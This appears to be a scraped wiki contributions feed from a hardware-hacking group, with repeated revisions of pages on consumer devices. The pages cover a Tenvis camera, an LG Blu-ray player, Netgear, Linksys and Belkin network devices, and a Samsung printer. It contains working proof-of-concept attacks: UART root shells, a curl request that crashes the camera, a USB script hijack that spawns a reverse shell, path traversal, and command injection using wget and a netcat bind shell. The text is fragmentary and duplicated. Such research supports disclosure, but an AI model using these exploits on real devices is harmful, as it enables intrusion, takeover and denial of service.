[https://www.amazon.com/Samsung-ProXpress-SL-M3320ND-Monochrome-Printer/dp/B00COA3GVE Purchase the Samsung SL-M3320ND at Amazon]

==Unsigned NAND Backup and Overwrite==

?????????

<gallery>
SAMSUNG_SLM3320ND_NAND.JPG
SAMSUNG_SLM3320ND_FW_HEX.JPG
SAMSUNG_SLM3320ND_INK_LEVEL.JPG
</gallery>

File:SAMSUNG SLM3320ND INK LEVEL.JPG

2017-08-09T04:51:51Z

0x00string:

File:SAMSUNG SLM3320ND FW HEX.JPG

2017-08-09T04:51:43Z

0x00string:

File:SAMSUNG SLM3320ND NAND.JPG

2017-08-09T04:51:32Z

0x00string:

File:SAMSUNG SLM3320ND.JPG

2017-08-09T04:50:23Z

0x00string:

Tenvis T8810

2017-08-09T04:42:50Z

0x00string:

__FORCETOC__
{{Disclaimer}}
[[File:TENVIS_T8110.JPG|120px|left|thumb]]
[[Category:Networking]]

=Tenvis T8810=

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/dp/B01MFBBYO8 Purchase the Tenvis T8810 at Amazon]

==Hardware Root==
The UART interface on this device is located [pictured], and runs at ?????????? and auto boots after a three second delay. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh

<pre style="white-space: pre-wrap;">
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm
</pre>

<gallery>
TENVIS_T8110_UART.JPG
</gallery>

==Remote Denial of Service==

===WARNING===

This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.

Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.

<pre style="white-space: pre-wrap;">
curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed
<pre>

Tenvis T8810

2017-08-09T04:42:07Z

0x00string:

__FORCETOC__
{{Disclaimer}}
[[File:TENVIS_T8110.JPG|120px|left|thumb]]
[[Category:Networking]]

=Tenvis T8810=

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/dp/B01MFBBYO8 Purchase the Tenvis T8810 at Amazon]

==Hardware Root==
The UART interface on this device is located [pictured], and runs at ?????????? and auto boots after a three second delay. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh

<pre>
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm
</pre>

<gallery>
TENVIS_T8110_UART.JPG
</gallery>

==Remote Denial of Service==

===WARNING===

This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.

Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.

<pre>
curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed
<pre>

File:TENVIS T8110 UART.JPG

2017-08-09T04:40:18Z

0x00string:

File:TENVIS T8110.JPG

2017-08-09T04:40:08Z

0x00string:

Tenvis T8810

2017-08-09T04:35:04Z

0x00string: Created page with "__FORCETOC__ {{Disclaimer}} thumb Category:Networking =Tenvis T8810= == Purchase == Buying devices is expensive and, in a lot of ca..."

__FORCETOC__
{{Disclaimer}}
[[File:TENVIS_T8810.JPG|120px|left|thumb]]
[[Category:Networking]]

=Tenvis T8810=

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/dp/B01MFBBYO8 Purchase the Tenvis T8810 at Amazon]

==Hardware Root==
The UART interface on this device is located [pictured], and runs at ?????????? and auto boots after a three second delay. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh

<pre>
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm
</pre>

<gallery>
TENVIS_T8810_UART.JPG
</gallery>

==Remote Denial of Service==

===WARNING===

This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.

Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.

<pre>
curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed
<pre>

LG BP350

2017-08-06T04:42:05Z

0x00string:

__FORCETOC__
{{Disclaimer}}
[[File:LG_BP350.JPG|left|thumb|160px]]
[[Category:Blu-Ray Players]]

=LG BP350=

"Enjoy TV shows, movies and more with this LG BP350 Blu-ray player, which features built-in Wi-Fi for access to Netflix, YouTube, Hulu Plus and other content. Blu-ray Disc and DVD playback in up to 1080p resolution enables a high-definition experience."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/LG-Electronics-BP350-Blu-Ray-Player/dp/B00TIAXSDY/ref=as_li_ss_tl?s=electronics&ie=UTF8&qid=1501937453&sr=1-1&keywords=BP350&linkCode=ll1&tag=exploiteers-20&linkId=79d2d5e81593803f0bc89ca5e9d0e485 Purchase the LG BP350 Blu-ray Player at Amazon]

==App Launcher Script Hijack==

The LG BP350 includes an optional Pandora Internet Radio App which, once installed, results in a vulnerability caused by the launcher script, as illustrated below, for pandora checking against paths of volumes which are mapped to USB drives before executing the script at the path on the local filesystem. By creating a script named PandoraApp and placing it in the root of a flash drive and plugging it into the set top box, any arbitrary script can be executed with root privileges.

<pre>
cat /mnt/rootfs_normal/usr/local/bin/pandora/pandora.sh
#!/bin/sh
#

echo "Enter pandora.sh"
echo "Call pandorastub" $PWD

export QT_QWS_FONTDIR=/usr/share/font
echo "pandora font path = " $QT_QWS_FONTDIR

export QT_PLUGIN_PATH=/plugins
echo "QT_PLUGIN_PATH =$QT_PLUGIN_PATH"

if [ -e /mnt/sda1/PandoraApp ]; then
echo "/mnt/sda1/PandoraApp -qws -display directfb"
/mnt/sda1/PandoraApp -qws -display directfb
elif [ -e /mnt/sdb1/PandoraApp ]; then
echo "/mnt/sdb1/PandoraApp -qws -display directfb"
/mnt/sdb1/PandoraApp -qws -display directfb
else
echo "pandora not for vosd"
echo "/usr/local/bin/pandora/PandoraApp -qws -display directfb"
/usr/local/bin/pandora/PandoraApp -qws -display directfb
fi
</pre>

==POC==

The following command will add a file to a flashdrive that will spawn a reverse TCP shell, and proceed to execute the pandora app normally.

<pre>printf "/bin/bash -i >& /dev/tcp/172.20.20.20/4444 0>&1; /usr/local/bin/pandora/PandoraApp -qws -display directfb;" > /dev/yourflashdrive/PandoraApp</pre>

Netgear WN3000RP

2017-08-04T00:50:09Z

0x00string:

__FORCETOC__
{{Disclaimer}}
[[File:NETGEAR_WN3000RP.JPG|thumb|320px]]
[[Category:Netgear WN3000RP]]

=Netgear WN3000RP=

The Netgear WN3000RP is a wifi range extender which runs OpenWRT KAMIKAZE on MIPS32.

"Move around with your mobile devices and keep them connected by giving your existing WiFi coverage a boost. This small, easy-to-install wall-plug WiFi range extender also creates new WiFi connectivity for up to 1 wired device like a Smart TV, Blu-ray player or game console."

[https://www.amazon.com/NETGEAR-Version-Wi-Fi-Extender-WN3000RP/dp/B004YAYM06/ Amazon]

===Hardware Root===
The UART interface on this device is located [pictured], and runs at 57600,8n1. Once the device completes booting, a root shell is executed on the UART TTY. a telnet daemon can be launched by executing '/usr/sbin/telnetd &'

[[File:NETGEAR_WN3000RP_UART.JPG|thumb|320px]]

<pre>
Miniterm.py -p /dev/ttyUSB0 -b 57600
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
KAMIKAZE (bleeding edge, r18571) ------------------
* 10 oz Vodka Shake well with ice and strain
* 10 oz Triple sec mixture into 10 shot glasses.
* 10 oz lime juice Salute!
---------------------------------------------------
root@WN3000RPv3:/# /usr/sbin/telnetd &
</pre>

Netgear WN3000RP

2017-08-04T00:05:01Z

0x00string: Created page with "__FORCETOC__ {{Disclaimer}} 320px Category:Netgear WN3000RP =Netgear WN3000RP= The Netgear WN3000RP is a wifi range extender which ru..."

__FORCETOC__
{{Disclaimer}}
[[File:NETGEAR_WN3000RP.JPG|thumb|320px]]
[[Category:Netgear WN3000RP]]

=Netgear WN3000RP=

The Netgear WN3000RP is a wifi range extender which runs OpenWRT KAMIKAZE on MIPS32.

"Move around with your mobile devices and keep them connected by giving your existing WiFi coverage a boost. This small, easy-to-install wall-plug WiFi range extender also creates new WiFi connectivity for up to 1 wired device like a Smart TV, Blu-ray player or game console."

[https://www.amazon.com/NETGEAR-Version-Wi-Fi-Extender-WN3000RP/dp/B004YAYM06/ Amazon]

===UART===
The UART interface on this device is located [pictured], and runs at 57600,8n1. Once the device completes booting, a root shell is executed on the UART TTY. a telnet daemon can be launched by executing '/usr/sbin/telnetd &'

[[File:NETGEAR_WN3000RP_UART.JPG|320px]]

==POC==
<pre>
Miniterm.py -p /dev/ttyUSB0 -b 57600
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
KAMIKAZE (bleeding edge, r18571) ------------------
* 10 oz Vodka Shake well with ice and strain
* 10 oz Triple sec mixture into 10 shot glasses.
* 10 oz lime juice Salute!
---------------------------------------------------
root@WN3000RPv3:/# /usr/sbin/telnetd &
</pre>

File:NETGEAR WN3000RP UART.JPG

2017-08-04T00:03:39Z

0x00string:

File:NETGEAR WN3000RP.JPG

2017-08-04T00:02:38Z

0x00string:

Linksys WRT1200AC

2017-08-03T23:59:48Z

0x00string: Created page with "__FORCETOC__ {{Disclaimer}} 320px Category:Linksys WRT1200AC =Linksys WRT1200AC= Built on the foundation of our original WRT's open-..."

__FORCETOC__
{{Disclaimer}}
[[File:LINKSYS_WRT1200AC.JPG|thumb|320px]]
[[Category:Linksys WRT1200AC]]

=Linksys WRT1200AC=

Built on the foundation of our original WRT's open-source heritage, the Linksys WRT1200AC delivers superior network performance for the most demanding users. The WRT1200AC features two external antennas, a powerful 1.3GHz dual-core ARM, and Wireless-AC to provide high-speed Wi-Fi connections with exceptional range.

[https://www.amazon.com/Linksys-Dual-Band-Wireless-Gigabit-WRT1200AC/dp/B00UVN20T0 Amazon]

==Post Authentication Arbitrary File Access==

Arbitrary file access due to improper sanitization of path field in media sharing setup.

==POC==

Firmware Version: 1.0.5.177401

The following curl command is a Proof of Concept which demonstrates creating a file share at /.

<pre>curl -i -s -k -X 'POST' \
-H 'Content-Type: application/json; charset=UTF-8' -H 'X-JNAP-Action: http://linksys.com/jnap/storage/CreateFTPFolder' \
-H 'Expires: Fri, 10 Oct 2013 14:19:41 GMT' -H 'X-JNAP-Authorization: Basic <BASE64 CREDS>' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Referer: http://192.168.1.1/ui/1.0.99.177401/dynamic/home.html' \
-b 'initial-tab=; visited-index=true; ui-language=en-US; modelNumber=WRT1200AC; smartmap-filter-values=computer%2Cmobile%2Cprinter%2Cother%2Clan%2CwirelessTwo%2CwirelessFive%2CwirelessFive-2; smartmap-filter-set=online-network; admin-auth=Basic%20<BASE64 CREDS>; current-applet=A2DB16C0-59B9-4C79-9BF2-E5A3A307F9C1' \
--data-binary $'{\"name\":\"HAXHAXHAX\",\"partitionName\":\"/dev/sda1\",\"path\":\"/../../../../../../\",\"isReadOnly\":false,\"groupsWithPermission\":[\"testuser\",\"admin\"]}' \
'http://192.168.1.1/JNAP/'<pre>

File:LINKSYS WRT1200AC.JPG

2017-08-03T23:59:28Z

0x00string:

File:LG BP350.JPG

2017-08-03T23:55:29Z

0x00string:

File:DLINK 936L.jpg

2017-08-03T23:51:10Z

0x00string:

Belkin N300

2017-08-03T23:47:00Z

0x00string: Created page with "__FORCETOC__ {{Disclaimer}} 320px Category:Belkin N300 =Belkin N300= The Belkin N300 is a Wi-Fi Range Extender which runs a linux kernel on..."

__FORCETOC__
{{Disclaimer}}
[[File:BELKIN_N300.JPG|thumb|320px]]
[[Category:Belkin N300]]

=Belkin N300=
The Belkin N300 is a Wi-Fi Range Extender which runs a linux kernel on the RTL8196E chipset.

"With the Belkin Wi-Fi Range Extender, you can expand your home network's wireless connection up to an additional 5,000 square feet. It's incredibly simple to install and is compatible with virtually any router, so there's no need to reconfigure anything on your home wireless network. It's the fast, easy way to expand your home wireless connection."

[https://www.amazon.com/Belkin-Wall-Mount-Extender-Simple-F9K1015/dp/B00K6HKJKI/ Amazon]

===UART===
Hardware root:
The UART interface, at 38400 buad, will drop to a root shell after the device completes booting.

[[File:BELKIN_N300_UART.JPG|320px]]

==Remote Root==

Remote root:
The script located at /setting_hidden.asp, which is accessible before and after configuring the device, exhibits multiple remote command injection vulnerabilities. The following parameters in the [form name] form; [list vulnerable parameters], are not properly sanitized after being submitted to the web interface in a POST request. With specially crafted parameters, it is possible to inject a an OS command which will be executed with root privileges, as the web interface, and all processes on the device, run as root.

Caveats:
The device comes with a limited set of binaries, as well as a notably limited busybox binary. Because of this, the number of commands that can be executed via the command injection is limited. Initially achieving a remote shell is accomplished by executing a wget command to connect to a remote host and download a cross compiled netcat binary, then executed to serve /bin/sh on a given port. Once this is accomplished, a user can connect to the bind shell and have full access to their device.

==POC==

Working as of Firmware 1.00.08

The following curl command is a Proof of Concept which demonstrates injecting an OS command as root.

<pre>curl -i -s -k -X 'POST' -H 'Referer: http://192.168.206.1/setting_hidden.asp'\
-H 'Content-Type: application/x-www-form-urlencoded'\
--data-binary $'location_page=setting_hidden.asp&arc_action=vl_wizard_sel_ap&wl_ssid=">/dev/null;wget 10.0.0.1; echo "AAAA&wl_ssidforfile=BBBB&wl_seckey=CCCC&wl_seckeyforfile=DDDD&action=SetPassWord&formHiddenSSID=formHiddenSSIDpage&submit-url-ok=setting_checkpassword.asp&hidden_sectype=020&wl_rssi=ZXZX&wl_ssid_field=EEEE&key=FFFF&sec=wpa2a&bHiddenAP=1'\
'http://192.168.206.1/goform/formBSSetSitesurvey'</pre>

File:BELKIN N300 UART.JPG

2017-08-03T23:44:35Z

0x00string:

File:BELKIN N300.JPG

2017-08-03T23:43:54Z

0x00string:

Exploitee.rs - User contributions [en]

FireFU Exploit

Vizio P602UI

Tenvis T8810

Samsung SL-M3320ND

MUZO Cobblestone

AOBO Hidden Spy Camera 720P

GGMM E3 Smart Speaker

Cujo

Lutron L-BDG2-WH Caseta Smart Bridge

MUZO Cobblestone

File:MUZO.JPG

GGMM E3 Smart Speaker

File:GGMME3.JPG

Cujo

File:VERAEDGE LFD ROOT.JPG

File:VERAEDGE.JPG

Cujo

File:CUJO UART.JPG

File:CUJO GLUE.JPG

File:CUJO.JPG

AOBO Hidden Spy Camera 720P

File:AOBO.JPG

Vizio P602UI

File:VIZIO P602UI EMMC.JPG

File:VIZIO P602UI.JPG

Lutron L-BDG2-WH Caseta Smart Bridge

File:LUTRON CASETA UART.JPG

File:LUTRON CASETA.JPG

Samsung SL-M3320ND

File:SAMSUNG SLM3320ND INK LEVEL.JPG

File:SAMSUNG SLM3320ND FW HEX.JPG

File:SAMSUNG SLM3320ND NAND.JPG

File:SAMSUNG SLM3320ND.JPG

Tenvis T8810

Tenvis T8810

File:TENVIS T8110 UART.JPG

File:TENVIS T8110.JPG

Tenvis T8810

LG BP350​​

Netgear WN3000RP

Netgear WN3000RP

File:NETGEAR WN3000RP UART.JPG

File:NETGEAR WN3000RP.JPG

Linksys WRT1200AC

File:LINKSYS WRT1200AC.JPG

File:LG BP350.JPG

File:DLINK 936L.jpg

Belkin N300

File:BELKIN N300 UART.JPG

File:BELKIN N300.JPG

LG BP350